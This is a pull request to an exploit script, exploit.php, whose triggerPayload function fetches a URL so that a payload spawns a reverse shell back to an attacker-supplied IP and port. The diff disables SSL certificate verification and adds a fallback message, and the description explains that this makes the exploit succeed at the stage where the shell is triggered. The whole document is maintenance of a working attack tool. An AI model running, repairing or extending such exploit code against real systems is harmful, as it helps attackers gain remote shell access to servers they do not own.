### PR TITLE
Update exploit.php

### DIFF
--- a/exploit.php
+++ b/exploit.php
@@ -169,6 +169,8 @@ function triggerPayload($userVal) {
     curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']);
     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
     curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
+    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
+    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
     curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
 
     $headers = array();
@@ -179,7 +181,7 @@ function triggerPayload($userVal) {
     curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
 
     echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n";
-
+    echo "[+] If the shell doesn't spawn try manually browsing to {$userVal['profileGenUrl']}\n";
     curl_exec($curl);
 
 }


### PR DESCRIPTION
Added options for curl to ignore SSL certs on lines 172 and 173. For some reason the triggerPayload function doesn't ignore certs which is out of line with the other functions and can lead to the script working up to the point it needs to trigger the payload and generate the reverse shell.
Also added extra output on line 184 with details of URL to browse to just in case curl fails for any other reason.